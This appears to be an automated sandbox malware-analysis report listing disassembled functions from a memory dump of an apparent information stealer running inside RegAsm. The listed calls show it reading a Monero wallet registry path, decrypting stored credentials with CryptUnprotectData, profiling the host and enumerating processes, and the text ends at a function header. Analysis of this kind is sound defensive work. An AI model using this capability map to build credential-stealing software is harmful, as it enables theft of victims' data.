CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040527F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004052A6
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004052CA
CloseHandle.KERNEL32(?,?,00000400), ref: 004052E4
InternetCloseHandle.WININET(00000000), ref: 004052EB
InternetCloseHandle.WININET(?), ref: 004052F4

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2737972104-0
Opcode ID: cb0445c96f808b9b1b6cb8c65fe8f77d671c463bf542d28b644d3319abdfb56d
Instruction ID: 066dd02ed9fc39b173800dfe11309026a0c2be43c8eca03e9b45c8451571b10a
Opcode Fuzzy Hash: cb0445c96f808b9b1b6cb8c65fe8f77d671c463bf542d28b644d3319abdfb56d
Instruction Fuzzy Hash: 47414672900209ABDB10EFA0DC85EEE7B7DEF04704F10456AF905B21D0DB389A49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA01 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EA06

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

GetKeyboardLayoutList.USER32(00000000,00000000,004240C7,00000000,?,00000000), ref: 0040EA38
LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040EA46
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040EA51
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040EA7B

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

LocalFree.KERNEL32(?), ref: 0040EB1F

Strings

/ , xrefs: 0040EA89

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 2868853201-4001269591
Opcode ID: f994c510680abe1370d444185ac0d06701b51346f26486e2f48fddc1917a5d09
Instruction ID: 97666d30631a098710594466eb99f5a7a779b1dd74db042e62ea6268d08819e0
Opcode Fuzzy Hash: f994c510680abe1370d444185ac0d06701b51346f26486e2f48fddc1917a5d09
Instruction Fuzzy Hash: 6B314C71901218EECB14DFE6D885AEEBBB9FF48304F50486EF505B3281D7385A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040FED2 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FED7
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FEFD
Process32First.KERNEL32(00000000,00000128), ref: 0040FF0D
Process32Next.KERNEL32(00000000,00000128), ref: 0040FF1F
StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0040FF33
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FF46

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
String ID:
API String ID: 186290926-0
Opcode ID: 7f4f5a0f0ee70254b2625b135edba714e8cbb4997dae1c17c5eed851fa04f05c
Instruction ID: 336d9c1371be1000b212d017dd6a25f0c540d93733e806c214742f131b732849
Opcode Fuzzy Hash: 7f4f5a0f0ee70254b2625b135edba714e8cbb4997dae1c17c5eed851fa04f05c
Instruction Fuzzy Hash: 90014C71900119ABCB21AB55EC48ADEBBB9EF85350F1440A7F405F2250D7789F45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F039 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F03E

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F079
Process32First.KERNEL32(00000000,00000128), ref: 0040F08A
Process32Next.KERNEL32(?,00000128), ref: 0040F0F2
CloseHandle.KERNEL32(?,?,00000000), ref: 0040F0FF

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 599723951-0
Opcode ID: 4d06e5f3005154e5a9a5ff31dd86cbb29f3b4e1bc7181ad254eea3dd4934fdef
Instruction ID: a3f5c6517c6e1df6110bbc2fccbe3d679d4cc2f5ae45dce933268adf8c753fa0
Opcode Fuzzy Hash: 4d06e5f3005154e5a9a5ff31dd86cbb29f3b4e1bc7181ad254eea3dd4934fdef
Instruction Fuzzy Hash: E0213071A00118EBCB10DFAADD45AEEBBB9AF98305F40446EE405F3291DB784A089B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F43A Relevance: 7.6, APIs: 5, Instructions: 62commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00424A78,00000000,00000001,00424298,00000000,?), ref: 0040F45A
SysAllocString.OLEAUT32(00000000), ref: 0040F468
_wtoi64.MSVCRT ref: 0040F4AA
SysFreeString.OLEAUT32(?), ref: 0040F4BF
SysFreeString.OLEAUT32(00000000), ref: 0040F4C2

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: ed72fcf0c2035882c8e916bc95bc5d3d274c07c467df511f5fa18a5728e37a4e
Instruction ID: 19ba6aa7e825d37cfb73e992542b569313bb2b34551c043cffc42f9c3024fc6b
Opcode Fuzzy Hash: ed72fcf0c2035882c8e916bc95bc5d3d274c07c467df511f5fa18a5728e37a4e
Instruction Fuzzy Hash: 64118134A00218BFDB10CFA5D848B9E7FB9EF85754F1480BAE804EB251D775D506CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
HeapAlloc.KERNEL32(00000000,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 62e1056c78a3f24023a1fdf72ed8deb6e8d96f8ef2f78eddac7b94d0e7f5f07d
Instruction ID: 3752f543c3f1d5a382173cdf7a3bcb8f22aaf484663e3d0e1abfc109c36c0fd1
Opcode Fuzzy Hash: 62e1056c78a3f24023a1fdf72ed8deb6e8d96f8ef2f78eddac7b94d0e7f5f07d
Instruction Fuzzy Hash: 8CF03075640208FFDB155F91EC0AF9E7B7AEB44B40F104025FA01A91A0D7B19A119B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9AE Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ), ref: 0040E9BF
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E9C6
GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00424458,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E9D5
wsprintfA.USER32 ref: 0040E9F3

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 7c1b76a00ce3a0eaa6fa7f243851c7b19d5da63cfe1f6a25d7515a53caff0368
Instruction ID: 2892f31a1090f023aa7c51b6845b4259c32c7530b1dc0dad4ed8fecfbe6fcd73
Opcode Fuzzy Hash: 7c1b76a00ce3a0eaa6fa7f243851c7b19d5da63cfe1f6a25d7515a53caff0368
Instruction Fuzzy Hash: DCE02271700320BBDB1067B8BC0EF8A3B6EDB01320F100212FA15E21D0E674895487E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040668C Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004066AF
LocalAlloc.KERNEL32(00000040,?,?), ref: 004066C7
LocalFree.KERNEL32(?), ref: 004066E5

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 97aef5ebfb2d0572dbcd3ae25462a5dae47f840954029a95db224d964b08a9ac
Instruction ID: 71fb2d69f1e31fe7c789bff925abdbe5be94f9285ac401a9d0571dbdd394e3cf
Opcode Fuzzy Hash: 97aef5ebfb2d0572dbcd3ae25462a5dae47f840954029a95db224d964b08a9ac
Instruction Fuzzy Hash: 10011D76900208AFDB11DFA8DC848DEBBBDFF48600F100866F945E7250D7759950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8E7 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415689,004243BE), ref: 0040E8F3
HeapAlloc.KERNEL32(00000000,?,?,?,00415689,004243BE), ref: 0040E8FA
GetUserNameA.ADVAPI32(00000000,?), ref: 0040E90E

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: a7e5ef27a8eb478d6409e9c32a4a4886a2db29656f7f5b41abef61f854db315e
Instruction ID: 764a6115b0c55b02daa709efcafe6df264638fc510293ffa10acdc9ee02f75e6
Opcode Fuzzy Hash: a7e5ef27a8eb478d6409e9c32a4a4886a2db29656f7f5b41abef61f854db315e
Instruction Fuzzy Hash: DFD05EB6204204BBD7009BA5ED4EE8FBBBEEB84B15F100055FA02D3290EAF0990586B0

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB9D Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 0040EBAA
wsprintfA.USER32 ref: 0040EBBF

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 091f1f1bc726940fec641889086e2a62d2da06bc6932eac9de63e40440c6fbbb
Instruction ID: 74060d1a51a02853621cad8c24fe3866a17339d29bb3c0b740151dfb6ff693e9
Opcode Fuzzy Hash: 091f1f1bc726940fec641889086e2a62d2da06bc6932eac9de63e40440c6fbbb
Instruction Fuzzy Hash: 1ED05EB590021DDBCF10DBA0FC89E8977BDAB04308F4041A2A700F2090E374E61ECBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00415A5B Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00415033), ref: 00415A6F
GetProcAddress.KERNEL32(?,00415729), ref: 00415A86
GetProcAddress.KERNEL32(?,00415729), ref: 00415A9D
GetProcAddress.KERNEL32(?,00415729), ref: 00415AB4
GetProcAddress.KERNEL32(?,00415729), ref: 00415ACB
GetProcAddress.KERNEL32(?,00415729), ref: 00415AE2
GetProcAddress.KERNEL32(?,00415729), ref: 00415AF9
GetProcAddress.KERNEL32(?,00415729), ref: 00415B10
GetProcAddress.KERNEL32(?,00415729), ref: 00415B27
GetProcAddress.KERNEL32(?,00415729), ref: 00415B3E
GetProcAddress.KERNEL32(?,00415729), ref: 00415B55
GetProcAddress.KERNEL32(?,00415729), ref: 00415B6C
GetProcAddress.KERNEL32(?,00415729), ref: 00415B83
GetProcAddress.KERNEL32(?,00415729), ref: 00415B9A
GetProcAddress.KERNEL32(?,00415729), ref: 00415BB1
GetProcAddress.KERNEL32(?,00415729), ref: 00415BC8
GetProcAddress.KERNEL32(?,00415729), ref: 00415BDF
GetProcAddress.KERNEL32(?,00415729), ref: 00415BF6
GetProcAddress.KERNEL32(?,00415729), ref: 00415C0D
GetProcAddress.KERNEL32(?,00415729), ref: 00415C24
GetProcAddress.KERNEL32(?,00415729), ref: 00415C3B
GetProcAddress.KERNEL32(?,00415729), ref: 00415C52
GetProcAddress.KERNEL32(?,00415729), ref: 00415C69
GetProcAddress.KERNEL32(?,00415729), ref: 00415C80
GetProcAddress.KERNEL32(?,00415729), ref: 00415C97
GetProcAddress.KERNEL32(?,00415729), ref: 00415CAE
GetProcAddress.KERNEL32(?,00415729), ref: 00415CC5
GetProcAddress.KERNEL32(?,00415729), ref: 00415CDC
GetProcAddress.KERNEL32(?,00415729), ref: 00415CF3
GetProcAddress.KERNEL32(?,00415729), ref: 00415D0A
GetProcAddress.KERNEL32(?,00415729), ref: 00415D21
GetProcAddress.KERNEL32(?,00415729), ref: 00415D38
GetProcAddress.KERNEL32(?,00415729), ref: 00415D4F
GetProcAddress.KERNEL32(?,00415729), ref: 00415D66
GetProcAddress.KERNEL32(?,00415729), ref: 00415D7D
GetProcAddress.KERNEL32(?,00415729), ref: 00415D94
GetProcAddress.KERNEL32(?,00415729), ref: 00415DAB
GetProcAddress.KERNEL32(?,00415729), ref: 00415DC2
GetProcAddress.KERNEL32(?,00415729), ref: 00415DD9
GetProcAddress.KERNEL32(?,00415729), ref: 00415DF0
GetProcAddress.KERNEL32(?,00415729), ref: 00415E07
GetProcAddress.KERNEL32(?,00415729), ref: 00415E1E
GetProcAddress.KERNEL32(?,00415729), ref: 00415E35
LoadLibraryA.KERNEL32(00415033,?,00000040,00000064,0041203E,004116F5,?,0000002C,00000064,00411FBD,00411FFA,?,00000024,00000064,Function_00011F80,00411C75), ref: 00415E46
LoadLibraryA.KERNEL32(?,00415729), ref: 00415E57
LoadLibraryA.KERNEL32(?,00415729), ref: 00415E68
LoadLibraryA.KERNEL32(?,00415729), ref: 00415E79
LoadLibraryA.KERNEL32(?,00415729), ref: 00415E8A
LoadLibraryA.KERNEL32(?,00415729), ref: 00415E9B
LoadLibraryA.KERNEL32(?,00415729), ref: 00415EAC
LoadLibraryA.KERNEL32(?,00415729), ref: 00415EBD
LoadLibraryA.KERNEL32(dbghelp.dll,?,00415729), ref: 00415ECD
GetProcAddress.KERNEL32(751E0000), ref: 00415EE8
GetProcAddress.KERNEL32(?,00415729), ref: 00415EFF
GetProcAddress.KERNEL32(?,00415729), ref: 00415F16
GetProcAddress.KERNEL32(?,00415729), ref: 00415F2D
GetProcAddress.KERNEL32(?,00415729), ref: 00415F44
GetProcAddress.KERNEL32(701C0000), ref: 00415F63
GetProcAddress.KERNEL32(?,00415729), ref: 00415F7A
GetProcAddress.KERNEL32(?,00415729), ref: 00415F91
GetProcAddress.KERNEL32(?,00415729), ref: 00415FA8
GetProcAddress.KERNEL32(?,00415729), ref: 00415FBF
GetProcAddress.KERNEL32(?,00415729), ref: 00415FD6
GetProcAddress.KERNEL32(?,00415729), ref: 00415FED
GetProcAddress.KERNEL32(?,00415729), ref: 00416004
GetProcAddress.KERNEL32(753A0000), ref: 0041601F
GetProcAddress.KERNEL32(?,00415729), ref: 00416036
GetProcAddress.KERNEL32(?,00415729), ref: 0041604D
GetProcAddress.KERNEL32(?,00415729), ref: 00416064
GetProcAddress.KERNEL32(?,00415729), ref: 0041607B
GetProcAddress.KERNEL32(76310000), ref: 0041609A
GetProcAddress.KERNEL32(?,00415729), ref: 004160B1
GetProcAddress.KERNEL32(?,00415729), ref: 004160C8
GetProcAddress.KERNEL32(?,00415729), ref: 004160DF
GetProcAddress.KERNEL32(?,00415729), ref: 004160F6
GetProcAddress.KERNEL32(?,00415729), ref: 0041610D
GetProcAddress.KERNEL32(76910000), ref: 0041612C
GetProcAddress.KERNEL32(?,00415729), ref: 00416143
GetProcAddress.KERNEL32(?,00415729), ref: 0041615A
GetProcAddress.KERNEL32(?,00415729), ref: 00416171
GetProcAddress.KERNEL32(?,00415729), ref: 00416188
GetProcAddress.KERNEL32(?,00415729), ref: 0041619F
GetProcAddress.KERNEL32(?,00415729), ref: 004161B6
GetProcAddress.KERNEL32(?,00415729), ref: 004161CD
GetProcAddress.KERNEL32(?,00415729), ref: 004161E4
GetProcAddress.KERNEL32(75B30000), ref: 004161FF
GetProcAddress.KERNEL32(?,00415729), ref: 00416216
GetProcAddress.KERNEL32(?,00415729), ref: 0041622D
GetProcAddress.KERNEL32(?,00415729), ref: 00416244
GetProcAddress.KERNEL32(?,00415729), ref: 0041625B
GetProcAddress.KERNEL32(75670000), ref: 00416276
GetProcAddress.KERNEL32(?,00415729), ref: 0041628D
GetProcAddress.KERNEL32(76AC0000), ref: 004162A8
GetProcAddress.KERNEL32(?,00415729), ref: 004162BF
GetProcAddress.KERNEL32(6F500000), ref: 004162DE
GetProcAddress.KERNEL32(?,00415729), ref: 004162F5
GetProcAddress.KERNEL32(?,00415729), ref: 0041630C
GetProcAddress.KERNEL32(?,00415729), ref: 00416323
GetProcAddress.KERNEL32(?,00415729), ref: 0041633A
GetProcAddress.KERNEL32(?,00415729), ref: 00416351
GetProcAddress.KERNEL32(?,00415729), ref: 00416368
GetProcAddress.KERNEL32(?,00415729), ref: 0041637F
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00416395
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004163AB
GetProcAddress.KERNEL32(75AE0000), ref: 004163C6
GetProcAddress.KERNEL32(?,00415729), ref: 004163DD
GetProcAddress.KERNEL32(?,00415729), ref: 004163F4
GetProcAddress.KERNEL32(?,00415729), ref: 0041640B
GetProcAddress.KERNEL32(76300000), ref: 00416426
GetProcAddress.KERNEL32(6E800000), ref: 00416441
GetProcAddress.KERNEL32(?,00415729), ref: 00416458
GetProcAddress.KERNEL32(?,00415729), ref: 0041646F
GetProcAddress.KERNEL32(?,00415729), ref: 00416486
GetProcAddress.KERNEL32(6CEC0000,SymMatchString), ref: 004164A0

Strings

dbghelp.dll, xrefs: 00415EC3
InternetSetOptionA, xrefs: 0041639B
SymMatchString, xrefs: 0041649A
HttpQueryInfoA, xrefs: 00416385

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: 7ee123ca745573e8bcde7b4cf28fad0e34183204329153c31f3384655e5c68d7
Instruction ID: eb32395ba13ce1e9228dbc2fe4c46f07139afd4695291c90c7e5f4c2c57d84f8
Opcode Fuzzy Hash: 7ee123ca745573e8bcde7b4cf28fad0e34183204329153c31f3384655e5c68d7
Instruction Fuzzy Hash: F742E975411600EFDB1A9FA0FE48A293FB7FB08B61B14742AF905D2230D7364866EF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2F6 Relevance: 89.6, APIs: 37, Strings: 14, Instructions: 318
